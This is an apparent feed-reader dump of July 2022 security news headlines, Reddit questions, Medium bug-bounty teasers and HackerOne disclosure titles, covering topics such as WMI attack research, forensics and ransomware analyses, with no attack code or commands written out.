    Hello everyone! My name is Andrei and I am a master's student at the Technical University of Eindhoven (The Netherlands). I'm studying Information Security Technology, which is just fancy wording for cybersecurity. Currently, I am working on my master thesis, titled "Analysis of WMI-based Attacks in Microsoft Windows Environments" (the title is a work in progress). The main research idea is to look into what the differences are in how WMI is used by sysadmins vs how it is being misused by threat actors. Then, by identifying these differences, I can choose criteria that can be used for detection systems to lower the number of false positives specifically for WMI. And here comes my question. For my methodology, I need to hold a number of interviews with professionals from the sysadmin pool and from the pentester/red team pool. I am looking in this sub for red teamers who have work experience abusing WMI, who have a max of 45 minutes of free time, and have an open mind to have an informal and fun conversation with a student. The interview is a mix of open questions and filling in an Excel sheet. The sheet contains PowerShell and WMIC commands split into three categories: Enumeration, Code Execution, and Persistence. I am interested in whether you ever used those commands, in what context, and a concrete example. My list is also open for additions; probably I did not cover every command which can be used. I won't ask for too much personal information, only the name, position, and company you work/worked at. I would like to have a diverse pool of professionals (different companies, etc.). I will also send the questions and sheet in advance so you have an idea of how to answer some of them. Thank you for reading and I hope some of you would be interested in helping me or at least forwarding my request to people that would want to help me! And even if you can't help, a like or comment would help bump the post so it can get more attention. submitted by /u/MidWarz [link] [comments]
  • Open

    Hunting unknown vulnerability classes
    — Based: BlackHatBCS tradc— Continue reading on Medium »
    My Essential Recon Commands
    Resolution Continue reading on Medium »
    Step-wise Checklist for Web Penetration and Bug Hunters
    This checklist may help you to have a suitable methodology for bug bounty hunting. When you have done an action, don’t forget to check ;)… Continue reading on Medium »
    JSON web tokens (JWT) attacks
    What are JWTs? Continue reading on Medium »
    How I was able to bypass Open Redirect 3 times on the same program.
    Hello Security folks, here is an interesting finding which I want to share. As you know, I only write if it's a unique finding or if my approach… Continue reading on Medium »
  • Open

    War in Ukraine / July 18
    Day 146: Russia can force Ukraine to prolong the war Continue reading on Medium »
    OSINT Cheatsheet (sites,tools)
    Overview Continue reading on Medium »
    How to hire a threat intelligence analyst
    Alongside growing division across the world is a severely unstable, and therefore unpredictable, global economy. Ongoing conflicts, a… Continue reading on Medium »
    CyberSoc CTF — General Knowledge
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    imaginaryCTF: Unpuzzled4
    The Challenge Continue reading on Medium »
    imaginaryCTF: Journey
    The Challenge Continue reading on Medium »
  • Open

    Writeup for Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
    submitted by /u/xnyhps [link] [comments]
    Microsoft Azure Arc Logging Passwords in Plaintext
    submitted by /u/dinobyt3s [link] [comments]
    The Workings of Whatsapp's Backups (and why you should enable End-to-End Encrypted Backups)
    submitted by /u/IceCereal [link] [comments]
    chip-red-pill/MicrocodeDecryptor - understand how Intel mitigated the Spectre vulnerability, explore the implementation of Intel TXT, SGX, VT-x technologies
    submitted by /u/Gallus [link] [comments]
    EJS, Server side template injection RCE (CVE-2022-29078)
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-07-19 Review
    Incident response to the new WebSocket memory shell by ourren; Looking at cybersecurity review through the CNKI investigation by ourren; How to build a product for the defense sector from 0 to 1 by ourren; 2022 Software Supply Chain Security Technology White Paper by ourren; What I think the future of cybersecurity tools is: opening chapter by ourren; Linux persistence by ourren; Anti-anti-honeypot: the flaws of three anti-honeypot plugins as examples by ourren; WAF design ideas based on tracking markers by ourren. For more of the latest articles, visit SecWiki
  • Open

    Announcing Rust 1.62.1 (Vulnerability Fixed)
    Article URL: https://blog.rust-lang.org/2022/07/19/Rust-1.62.1.html Comments URL: https://news.ycombinator.com/item?id=32152495 Points: 2 # Comments: 0
    Multiple vulnerability leading to account takeover in TikTok SMB subdomain
    Article URL: https://hackerone.com/reports/1404612 Comments URL: https://news.ycombinator.com/item?id=32147645 Points: 2 # Comments: 0
  • Open

    AWS EC2 Auto Scaling Privilege Escalation
    Introduction Continue reading on Medium »
  • Open

    Fully Exploiting Data Sources
    Very often, we view data sources as somewhat one dimensional, and don't think about how we can really get value from that data source. We're usually working on a case, just that investigation that's in front of us, and we're so "heads down" that we may not consider that what we see as a single data source, or an entry from that data source (artifact, indicator), is really much more useful, more valuable, than how we're used to viewing it. So, what am I talking about? Let's consider some of the common data sources we access during investigations, and how they're accessed. Consider something that we're looking at during an investigation...say, a data source that we often say (albeit incorrectly) indicates program execution the "AppCompatCache", or "ShimCache". Let's say that we parse the App…
  • Open

    Extracting data from start and end addresses in memory.
    Hello all! I’ve hit a wall with volatility and am looking for advice on what I should do next. So far I have used the unloadedmodules plugin in volatility and have noticed some unloaded .sys files I want to carve out and analyze further. The plug-in displays the start and end address of the file in memory, but how do I use this information in volatility to carve out that section in memory? Any help would be greatly appreciated and thank you! submitted by /u/shikata_ganai [link] [comments]
  • Open

    How to deal with phishing incidents?
    One of my colleagues clicked on a malicious link and logged in with her business email credentials [business Gmail account]. When she found that the email is used for phishing, she changed her password and scanned the laptop. Fortunately, there was no malware downloaded. Are there any steps she should do besides what I already mentioned? submitted by /u/OmegaMan-PT [link] [comments]
    Mimikatz good starting point
    Hi, I have used mimikatz sometimes (mostly CTFs), but I would like to better understand its concepts. Can someone recommend me a valid starting point (URL, YouTube video, ..)? Thank you submitted by /u/g-simon [link] [comments]
    Why are collab tools such as Trello, Jira, Notion left open without any authentication procedure?
    Perhaps the collab tools are among the most important servers that must be managed appropriately. But there are so many exposed, open collab tools without any authentication process. https://blog.criminalip.io/2022/07/01/collaboration-tool-vulnerability/ Default configuration should be more secure, but it is less. I'd say not even 10% of people using Jira or collab tools understand how authentication works between components. People always think they're safe, that it's not their turn. But this is the fundamental reason why the critical datasets of enterprises are sold on the dark web or forums. submitted by /u/scopedsecurity101 [link] [comments]
  • Open

    FreeBuf Morning Report | Apple App Store hosts large numbers of fraudulent apps; FBI to fully upgrade its network infrastructure
    The FBI has set out many specific security requirements for the planned architecture, such as zero trust, SASE, strong isolation and visibility.
    Attacks targeting WordPress plugin vulnerabilities surge
    Researchers from Wordfence warn of a recent wave of attacks targeting WordPress page builder plugins.
    Using malware and phishing, Roaming Mantis targets Android and iOS users
    After hitting Germany, Taiwan, South Korea, Japan, the US and the UK, Roaming Mantis is turning to France.
  • Open

    Russian APT29 Hackers Use Online Storage Services, DropBox and Google Drive
    Cloaked Ursa (aka APT29) has recently used trusted online storage services to deliver Cobalt Strike. The post Russian APT29 Hackers Use Online Storage Services, DropBox and Google Drive appeared first on Unit 42.
  • Open

    HTML Injection in E-mail Not Resolved ()
    Acronis disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1600720
  • Open

    A simple understanding of V8 TurboFan
    Author: TokameinE@Knownsec 404 Lab. Date: July 19, 2022. "JavaScript code is itself a binary program." I don't know whether readers have heard this explanation somewhere, but I find the description quite vivid. Because JavaScript code is interpreted lazily, the interpreter only interprets a piece of code and generates the corresponding bytecode when a particular function is executed. But this bytecode changes as the code runs; the same code may, within a single execution...
    Pocsuite3 Tutorial for beginners
    Author: Knownsec 404 Team Chinese version: https://paper.seebug.org/1931/ 1 Introduction Pocsuite3 is a remote vulnerability testing framework based on GPLv2 license and open source created by Kno...
  • Open

    Good things takes time | Story of my first “valid” critical bug!
    No content preview
    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    No content preview
  • Open

    Bunch of classical and Church music
    https://dataup.sdasofia.org/MUSIC/ submitted by /u/chloroformica [link] [comments]
    How to search better than the OD search sites?
    I use all of the open directory search sites, and I do find what I'm looking for, but is there another method? For example, using Google dorks to find files, or some kind of Python script, etc.? submitted by /u/G-Streams [link] [comments]
  • Open

    Which browser is the best to start with? Chrome, Edge, Firefox etc
    I’ve spent the last few months going through the different classes of memory corruption vulns + writing exploits for different CVE’s and want to start diving into VR. Which browser is the most noob friendly? Should I even be targeting browsers at this point in my learning? submitted by /u/Amullatoavibrato [link] [comments]

  • Open

    PDFs of literature in the public domain
    submitted by /u/Nerditter [link] [comments]
    3d modelling stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Question
    Is there a directory of 3D models from Sketchfab or anything? (specifically paid ones) Or is there a current Reddit post that has a directory of 3D models? Or a subreddit? Hopefully I'm not breaking the 2nd rule. submitted by /u/Particular_Bed2427 [link] [comments]
  • Open

    Unit 42 Threat Group Naming Update
    Threat group naming helps track and identify attackers' activities. Unit 42 is looking to the stars for an updated approach. The post Unit 42 Threat Group Naming Update appeared first on Unit 42.
  • Open

    new privesc on AWS (DataScientist policy)
    submitted by /u/stk_ [link] [comments]
    /r/netsec's Q3 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead). submitted by /u/ranok [link] [comments]
    unRAR CVE-2022-30333 deep dive (including full exploit for Zimbra)
    submitted by /u/iagox86 [link] [comments]
    Disrupting Kill Chains with Just-in-Time Access Environments
    submitted by /u/mesok8 [link] [comments]
    Building a process to evaluate security tools
    submitted by /u/LivingInSyn [link] [comments]
    A Deep Dive Into ALPHV/BlackCat Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Research: Auditing WordPress Plugins (35 CVEs in 3 months)
    submitted by /u/andersonmvd [link] [comments]
  • Open

    How can I block Venntel / Gravy Analytics?
    Venntel and Gravy Analytics use app integration to harvest and sell location data. How can I block this data leak using a firewall rule? Is there a way to know if an app installed on my iPhone or Android report to Venntel or Gravy Analytics? The bulk of the location data ... came from its contract with Venntel, a location data broker based in Virginia. Venntel is a subsidiary of Gravy Analytics, an advertising company that specializes in location data. Gravy Analytics is the leading provider of real-world location intelligence for marketers. ... verifies consumer attendances at millions of places, points-of-interest, and local events, providing unprecedented visibility into the offline consumer journey. Gravy Analytics processes billions of pseudonymous, mobile location signals every day from millions of mobile devices to understand where people go and why. The analytics application platform turns location data into intelligence.... Venntel draws its data from mobile applications such as weather trackers and mobile games, which require location access to play. The company that originally collected that information then sells the data.... submitted by /u/Janice_2022 [link] [comments]
    how to clean up a wordlist?
    I have used crunch to generate an 8-digit wordlist, and I would like to remove any result that has a single number repeated sequentially more than 4 times. For example, I want to keep these: 0034001 2227422 but remove these: 0000341 2222274. What is the best way to do that? For now, I'm thinking of making another wordlist containing these results and subtracting them from the main wordlist using: comm -2 redundant.txt main.txt > cleaned.txt. But I was wondering if there is a better way. Thanks submitted by /u/gamer121323 [link] [comments]
    Does anyone know any free database for URL categorisation?
    As per title - I am aware that these might not be curated, complete or 100% reliable - I was wondering if anyone knows any open source database/collection for URL categorisation. The use case is: given a URL, determine if it points to a) malicious website/IP b) adult content c) religious - just to name a few examples. I am aware that there are resources for a specific use case (malicious IP, websites) and/or there are paid options that address this. submitted by /u/OneEyedMerchant [link] [comments]
    How much karma is needed to post to r/netsec? how old does the account have to be?
    I tried to post content with a fresh account, but the post just gets auto-flagged as spam. When trying to reach out to the mods, the account was either suspended or the mods are rejecting direct messages. Quite at a loss here. Is there a guideline on how much karma an account needs or how old an account has to be to post to r/netsec? TIA. submitted by /u/haxflilet [link] [comments]
  • Open

    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    … Continue reading on InfoSec Write-ups »
    Busy Sunday Because Of Privilege escalation
    How I was able to take over a whole website and get access to all users' accounts, get access to sensitive data of all users; I was able to… Continue reading on Medium »
    MSA Weekly 4 — “How to Get Subdomain’s Using Subfinder & Sudomy”
    Indonesia Continue reading on Medium »
    Hey Google Lets submit bug from Victim Account !
    Introduction: This is the story of how my bug bounty journey helped me to pay for my college fees. Continue reading on Medium »
    MSA Weekly 4 — "How to Get Subdomain's Using Subfinder & Sudomy"
    Subdomain enumeration is the process of discovering subdomains and helps reveal domains/subdomains where bugs are likely to appear… Continue reading on Medium »
    Good things takes time | Story of my first "valid" critical bug!
    Hello there, I am Krishna Agarwal ( Kr1shna 4garwal ) from India 🇮🇳. An ordinary bug hunter and so-called security researcher :) Continue reading on Medium »
    Bug Bounty Program
    Resolve bugs … Continue reading on Medium »
    Bug Bounty: Blind XSS Payloads Explained
    This article was originally posted on bepractical.tech Continue reading on Medium »
    MSA Weekly 4 — [How to Get Subdomain’s Using Subfinder & Sudomy]
    Subdomain’s Enumeration Continue reading on Medium »
  • Open

    CVE-2022-35909 / CVE-2022-35910, Incorrect Access Control and Stored XSS in Jellyfin
    This vulnerability affects version 10.7.7 (fixed in 10.8.0) Continue reading on stolabs »
  • Open

    War in Ukraine / July 15–17
    Day 145: Russia’s losses are at least 50,000 soldiers Continue reading on Medium »
  • Open

    SecWiki News 2022-07-18 Review
    SecWiki Weekly (Issue 437) by ourren. For more of the latest articles, visit SecWiki
  • Open

    Without verifying email and activating the account, a user can perform all actions which are not supposed to be done
    Stripe disclosed a bug submitted by tabaahi: https://hackerone.com/reports/1272305 - Bounty: $100
    subdomain takeover at odoo-staging.exness.io
    EXNESS disclosed a bug submitted by omer: https://hackerone.com/reports/1540252 - Bounty: $100
    unauth mosquitto ( client emails, ips, license keys exposure )
    Acronis disclosed a bug submitted by second_grade_pentester: https://hackerone.com/reports/1578574 - Bounty: $150
    Cross-site scripting (DOM-based)
    OneWeb disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1512644
    CVE-2019-11248 on http://...:9100/debug/pprof/goroutine
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1607940
    Public Apache Tomcat /examples example directory
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1622624
  • Open

    ICS: beware of password-cracking software for PLCs and HMIs
    This attack campaign uses password-cracker software to gain access to programmable logic controllers (PLCs) and turn them into bots in a botnet.
    FreeBuf Morning Report | Albanian government websites shut down by cyberattack; Tor Browser can automatically bypass internet censorship
    Albania's National Agency for Information Society said that, due to attacks by foreign hackers, Albanian government websites and online public-service sites were temporarily shut down.
    Book giveaway | Still don't understand zero trust? A copy of "Zero Trust in Plain Language" for you
    With the arrival of the cloud computing and mobile office era, the traditional security model has gradually become ineffective, and "zero trust" has become the most widely recognized security architecture today.
    Vulnerability in Digium software exploited by threat actors to attack VoIP servers
    Unit 42 researchers discovered a campaign targeting the Elastix system used in Digium phones since December 2021.
    Research finds attackers spreading malicious code on GitHub using forged timestamps and other tricks
    Security vendors warn that developers need to be cautious with open-source projects on GitHub, which may harbor malicious code.
    Premint NFT suffers the largest NFT hack in history
    The well-known NFT platform Premint NFT was compromised; attackers stole 314 NFTs.
    Tor Browser gets a major update and can automatically bypass internet censorship
    The Tor Project announced the release of Tor Browser 11.5, and this update has just one purpose: helping users automatically bypass internet censorship.
    Key points of data compliance in the Philippines
    Enforcement of data compliance in the Philippines is strict and comprehensive, and compared with other countries the Philippine data protection legal system is more complex.
  • Open

    Incident response for the new websocket in-memory webshell
    Author: flamingo. Original link: https://mp.weixin.qq.com/s/T3UfA1plrlG-e9lgfB4whg A few days ago I saw a post about a new type of websocket memory shell. Because it registers itself under Ws, the usual in-memory detection script memshell scanner cannot detect it quickly. Project address: https://github.com/veo/wsMemShell To avoid stumbling during incident response...
  • Open

    Linux tracing/profiling basics: symbol tables, call stacks, perf/bpftrace examples, etc. (2022)
    Collected tracing/profiling notes, drawn mainly from the Practical Linux tracing series of articles. 1 Introduction 1.1 Hotspot and call-stack analysis (perf record/report/script) 1.2 Symbols 1.3 Summary 2 Minimal hello-world program: exploring symbols 2.1 C source 2.2 Compiling to an object file (without -g) 2.3 Inspecting the object file (objdump/readelf) 2.4 Tracing hello-world execution with bpftrace 2.5 Summary 3 Symbols 3.1 Dynamic symbols (.dynsym) vs. local symbols (.symtab) 3.2 stripped vs. not stripped 3.2.1 Manually removing local symbols (strip -s) 3.2.2 Tracing local functions with bpftrace again 4 Debug symbols (gcc -g): the DWARF format 4.1 Uses of debug symbols 4.1.1 Use one: mapping memory addresses to specific source lines 4.1.2 Use two: stack unwinding 4.2 Some problems with the DWARF format 5 Stack unwinding (method two): frame pointer 5.1 Basic principle 5.2 Example 5.3 The problem: the default compile flag -fomit-frame-pointer 6 Profiling & tracing 6.1 Perf profiling 6.2 bpftrace profiling 6.3 bpftrace event tracing Kernel tracing User space tracing 7 /proc/ /* 7.1 /proc/<pi…

  • Open

    Open Redirect .8x8.com
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1637571
    Information disclosure ( Google Sales Channel )
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1584718 - Bounty: $500
  • Open

    Mock Investigations or Training Cases??
    Anyone familiar with any sites or programs where you can try out what you may know, and perhaps some that show you a disk image and point out things you may have missed? Nearly a year of General Ed classes since my last Forensics class has taken a toll and I'm trying to refresh. Any help would be appreciated. Thanks. submitted by /u/DeviantWolfe [link] [comments]
    PowerShell command history (windows forensics)
    When running a PowerShell command or a ps1 script, what forensic evidence is left behind? I know of the event logs and general PowerShell history. Is there anywhere else that can be investigated to see if PowerShell commands have been executed, or any particular artifacts to look for? Still new to Windows forensics, thanks in advance :) submitted by /u/EnormousJohnson [link] [comments]
    Where can I find useful system logs in windows and Linux beside the basic event viewer and journalctl logs?
    I work on debugging system errors and want to get good at forensics. Where can I find good system logs? Sorry if it's a basic question. submitted by /u/iObjectUrHonor [link] [comments]
  • Open

    A little bit of housekeeping please.
    Apologies mods - not trying to add to any workload but there are a few glaring issues. Could we reroute the search box to either koalabear84's search or site:reddit.com/r/opendirectories %s? Either has pros and cons, but reddit search is objectively shit. While we're at it - since we have to add a flair/tag when we post, could we not also implement a mandatory search in the posting process? I know reddit kinda implements this atm but again, its search is frankly fucking dismal. Finally: in the reporting dialog could we add a couple of entries: This has been reposted more times than that reaction pic of THIS IS NOT AN OPEN DIRECTORY EDITED. submitted by /u/ringofyre [link] [comments]
  • Open

    Join the Morningstar's Discord Server! tells you ways to get free stuff from websites
    submitted by /u/nightmarejh10 [link] [comments]
  • Open

    Finding 0-days in Enterprise Application
    No content preview
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
  • Open

    Finding 0-days in Enterprise Application
    A tale of ‘Site-wide Account Takeover’ Continue reading on InfoSec Write-ups »
    Gauing+Nuclei for Instant Bounties
    Back again with the instant bounties series. Last time we learned how to score instant bounties with Google dorks, so check that out if you… Continue reading on Medium »
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
    A Story Of My First Bug Bounty
    Hello everyone, Continue reading on Medium »
    MSA Weekly 4 — “How to Get Subdomains Using Subfinder & Sudomy”
    In the penetration testing or hacking process there are several steps/workflows that penetration testers or hackers usually carry out before… Continue reading on Medium »
    Web Application Security & OWASP’s Juice Shop
    Throughout my entire IT career, I have always felt I lack programming and web development skills. This stems from the fact that I have… Continue reading on Medium »
    Intro to Bug Bounty Hunting.
    Hey Guys! Hope you all are doing great! Continue reading on Medium »
    A Simple Buffer Overflow Demonstration — Part 2
    Hello Security folks, In the previous article, we came to know what a Buffer Overflow is, its types, and how it occurs. In this article… Continue reading on Medium »
  • Open

    LSASS Memory Dump and Detection
    Basic Overview Continue reading on Medium »
  • Open

    SecWiki News 2022-07-17 Review
    Incident Response Capability Improvement 6: Incident Response Topic Wrap-up Meeting by aerfa; Incident Response Capability Improvement 5: Review of Incident Response Reports by aerfa; Incident Response Capability Improvement 4: Practical Incident Response Experience by aerfa. For more of the latest articles, visit SecWiki
  • Open

    New RedAlert ransomware targets VMware ESXi servers
    New RedAlert ransomware targets VMware ESXi servers
    Research on payload construction approaches for Python web SSTI
    Preface: I have been working with Python web SSTI for a while now, and my impression is that the principle is easy to understand but exploitation is always somewhat difficult (I cannot apply it flexibly). Thinking it over, the principle is still not clear enough to me, so in this article, from a beginner's perspective and starting from the principles…
    A detailed guide to tunnels and proxies in the SSH protocol
    A detailed explanation of the use of tunnel connections and proxies in the SSH protocol.
    SAFEIS: tracing and analyzing the UNISWAP security incident!
    In the hacker attack targeting UNISWAP, many users suffered heavy losses, including some well-known figures.
  • Open

    51 OSINT extensions for Chrome
    Let’s try to turn the standard CHROME browser into a full-fledged OSINT explorer tool. Continue reading on Medium »
    SPY NEWS: 2022 — Week 28
    Summary of the espionage-related news stories for the Week 28 (July 10–16) of 2022. Continue reading on Medium »
    Identifying the recruiters of MyPertamina buzzers
    As of 1 July 2022, Pertamina has been trialing fuel purchases through the MyPertamina app. There are many pros and cons in… Continue reading on Medium »
    Who’s this war against? Data from June
    Data suggests Russia’s attention in its invasion of Ukraine is directed more towards westward ‘unfriendly’ countries than to Ukraine… Continue reading on Medium »
  • Open

    GitHub - karimhabush/cyberowl: A daily updated summary of the most frequent types of security incidents currently being reported from different sources.
    submitted by /u/karimhabush [link] [comments]
    Build your first LLVM Obfuscator
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    StartupApproved\Run, pt II
    On the heels of my last blog post on this topic, I had a couple of thoughts and insights that I wanted to research a bit, and then address. I wanted to take a look at ways that the StartupApproved\Run key might be impacted, so I started by grabbing the contents of that key based on what we saw from the previous post, which are illustrated in figure 1. Fig 1: StartupApproved\Run key contents Then, I captured the contents of the Run key, illustrated in figure 2. Fig 2: Run key contents As you can see in figure 2, there appears to be an entry missing, the "com.squirrel.Teams.Teams" value. We know from the previous blog post that this value was disabled on 14 Jul 2021, just over a year ago. I have no idea how that happened, as it wasn't part of an intentional test at the t…
  • Open

    Basic BloodHound query for a single machine
    Hi, I am practicing with some Active Directory labs (hackthebox); I downloaded stuff with Sharphound and imported it into my BloodHound installation. There are about 2k users and 500 computers in this lab. Let's say I would like to "start" with a specific computer name and look for the best path to compromise such a machine; how can I do that? What is the query syntax for searching for a specific computer name? Thank you submitted by /u/g-simon [link] [comments]
    Can attacker gain access to my private network application through pivoting and/or lateral movement?
    I am using a public wifi network to work on some web development. When I start a nodejs express server on my local machine at port 3000, I can access that website on another device (that is connected to the same public wifi network) by going to http://(private ip address of nodejs host assigned by public wifi dhcp):3000/index.html, for example. So to prevent this, I had my phone connect to the public wifi network and fired up the built-in android hotspot. Then I connected my nodejs host machine to the hotspot to start the express server at port 3000. I could no longer access that website from a different device on the public wifi network because the express server was now inside the private network within that public wifi network. I can ping from a device inside the android hotspot private network to a device in the public wifi network. But the device from the public wifi network could not ping devices inside the android hotspot private network. Is there a way for an attacker on that public wifi network to gain access to my android hotspot private network without knowing the SSID passphrase? Could they use some kind of network pivoting technique so that they can access my private html website on port 3000? Using something like ip route add? submitted by /u/Fuzzht1 [link] [comments]
    Practical malware analysis book versions
    Hey guys! I'm looking at getting the practical malware analysis book by Michael Sikorski and Andrew Honig, however there seems to be one published in 2012 and another in 2017. Does anyone know if there's any difference between the 2? I'm thinking maybe one is the ebook and the other paper but content the same. Cheers! submitted by /u/semening [link] [comments]

  • Open

    An Overview of Exploit Dev Course Content
    submitted by /u/PM_ME_YOUR_SHELLCODE [link] [comments]
  • Open

    New.Student.Help
    Hi everyone, I’m a student new to cyber forensics. I have read up about file carving and hex carving but was wondering how the two are related. Is hex carving considered file carving? Or maybe a subset of file carving? Also, given a situation where you have to search a company’s file system to scrape all the images in a Word document, how best would you approach this? Can hex carving or file carving be considered in this situation and if so, which is better? Thank you submitted by /u/EricaHellscythe [link] [comments]
    Mem dump with malware
    Does anyone know where I can get my hands on memory dump files with live malware on it? I tried running TheZoo on a VM, but I'm having trouble getting malware to detonate other than ransomware. I figured someone might know where I can get a .dmp file that already has the malware in it. Thank you! submitted by /u/DeadBirdRugby [link] [comments]
    New to Forensics, Drop some Forensics tools/training content
    I tried Autopsy and Volatility at a basic level, what else should I go for? submitted by /u/ItsMeTheBatman [link] [comments]
    When does SANS eat itself
    Most SANS DFIR courses are now $7640 and with the exam fee of $949 they price out at $8589. I have attended multiple SANS events and currently hold two GIAC certs so I know the quality of the classes BUT... what is the tipping point? We're getting close to 10K for a one-week class. At some point it becomes unsustainable for most organizations. The DFIR training area seems ripe for disruption. Why isn't there any competition offering a similar product at a much better price point? submitted by /u/7174n6 [link] [comments]
  • Open

    password reset No Rate Limiting
    Hey guys, my name is RISHI NIKAM. I am a Security Researcher and bug bounty hunter. Continue reading on Medium »
    First Bug Bounty from DOS: Taking the service down
    Hello friends, This is Faique, a security researcher & an ethical hacker from India, and this is a journey to my first bug bounty. Continue reading on Medium »
    CRLF to Account takeover (chaining bugs)
    Hi, everyone Continue reading on Medium »
    Authorization token leak from verify email endpoint
    While testing a website I found that the verify email endpoint was leaking the authorization tokens of any verified users by just passing… Continue reading on Medium »
    Local File Inclusion (interesting method)
    Hello researchers, This is Captain_hook and I decided to share an interesting LFI vulnerability that I found in BC’s program. Continue reading on Medium »
    Subdomain takeover and Text injection on a 404 error page-$100 bounty
    Hello everyone! I’m Jeewan Bhatta and I am here with my first HackerOne bug write-up. Hope you all are doing great. So now I am gonna tell… Continue reading on Medium »
    Business logic error
    I Can Delete your email, you can’t register on the website Continue reading on Medium »
    Bypass OTP by manipulating response parameters
    In this real-life tutorial you will learn about a parameter manipulation vulnerability which can let hackers bypass OTP and finally… Continue reading on Medium »
    Bug hunting from a car on the cheap, mostly,
    Or, how I learned to hate typing on my phone Continue reading on Medium »
  • Open

    What can I do to get hired as a SOC analyst?
    Just passed Security+ and already have Network+, coming from an intelligence analysis background (metadata analysis, creating workflows with Python, threat research and development, etc.) and very serious about getting into network security. What can I do to improve my chances at landing a SOC analyst role? These are the things I'm planning on doing: Practicing SOC skills on letsdefend.io (and possibly also hackthebox and tryhackme) - more interested in blue team at the moment though. Building up my homelab (just ordered a modem and better router to replace my ISP-provided gear) and potentially setting up a syslog server and/or putting freeradius on my Pi (definitely overkill for a home network but it's to learn). 16-hour SOC core skills course with Antisyphon/Black Hills Security (this week!) What else can I be doing aside from the obvious (reading up about CVEs, cyber news, etc.) to land this SOC gig? Get another cert? CySA+? Linux+? GSEC? GSOC? (I can get reimbursed for some of the costs but they are expensive as heck). Thanks! submitted by /u/WLANtasticBeasts [link] [comments]
    Blue team bug bounty equivalent?
    Just wondering if there is some program like bug bounties but for blue team professionals. Edit: The characteristics of the bug bounty ideas such as doable on free time, accessible any time and earns you money. Idk what else to add but I think you get the idea. submitted by /u/Chroll-On [link] [comments]
  • Open

    How Windows Processes Work - CreateProcess Workflow (Part 2)
    submitted by /u/sciencestudent99 [link] [comments]
  • Open

    MS-Interloper: On the Subject of Malicious MSIs
    submitted by /u/dmchell [link] [comments]
    Process Injection using QueueUserAPC Technique in Windows
    submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-07-16 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    Can use the Reddit android app as usual even though revoking the access of it from reddit.com
    Reddit disclosed a bug submitted by sateeshn: https://hackerone.com/reports/1632186
  • Open

    RouterSpace from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Decade old anarchy stuff.
    Again, sorry if it was already posted. https://www.hou2600.org/ftp/textfiles/ submitted by /u/RainyAbrar [link] [comments]
    Random 2010 stuff?
    Don't know if it's already posted. http://www.fricking.ninja/DIY/index/ submitted by /u/RainyAbrar [link] [comments]

  • Open

    Null to Bug: Insecure Direct Object Reference
    What is Null to Bug? Continue reading on Medium »
    How I got CEH (Certified Ethical Hacker) Master Certified. (Resources included)
    Hello Infosec Family. I am Shubham Ghosh, an Information Security Analyst with an experience of 2+ years from Jharkhand, India. This… Continue reading on Medium »
    How I Got My First CVE
    Hello readers, Continue reading on Medium »
    GOOD RECON LEADS TO SENSITIVE ACCOUNTS
    Hello people, I am back with a new hacking story!! So yesterday I was hunting on one of the VDP programs, let’s consider it xyz.com. So… Continue reading on Medium »
    Ability to login as google staff in Google Cloud Community
    -Gaurav Bhatia (Bug Hunter, CTF Player) Continue reading on Medium »
    How I spammed a Google meet (But for good)
    Hacking isn’t always about account takeover, authentication bypass, or authorization abuse. Sometimes it’s about functionality abuse and… Continue reading on Medium »
    Information Source Code Disclosure Directory .git — MNC Play
    On 15 October 2020 I found a SQL Injection BUG in payment.mncplay.id but there was no response from MNC Play. Continue reading on Medium »
    Paramspider lead to find SQLI vulnerability
    In this tutorial you will learn how real hackers can find injection vulnerabilities like : Continue reading on Medium »
  • Open

    Huge directory of every skill site you can think of!
    submitted by /u/orphickalon [link] [comments]
  • Open

    What is OSINT? Part — 1
    Do you use social media like Instagram, Facebook, Twitter, or Snapchat? Ahh, I know most of you are using it. Continue reading on Medium »
    War in Ukraine / July 14
    Day 142: Grain in exchange for the lifting of sanctions Continue reading on Medium »
    Holehe Transform using Maltego
    Overview Continue reading on Medium »
  • Open

    Insecure Object Permissions for Guest User leads to access to internal documents!
    IBM disclosed a bug submitted by mocr7: https://hackerone.com/reports/1089583
    Add me email address Authentication bypass
    LinkedIn disclosed a bug submitted by raajeevrathnam: https://hackerone.com/reports/1607645
    POST BASED REFLECTED XSS IN dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1451394
    [h1-2102] shopApps query from the graphql at /users/api returns all existing created apps, including private ones
    Shopify disclosed a bug submitted by inhibitor181: https://hackerone.com/reports/1085332 - Bounty: $1900
  • Open

    What are some must-learn relevant concepts in C?
    Things like pointers, memory management etc? Thanks submitted by /u/UseFit [link] [comments]
    Do you have Microsoft 365 focused security blogs you follow?
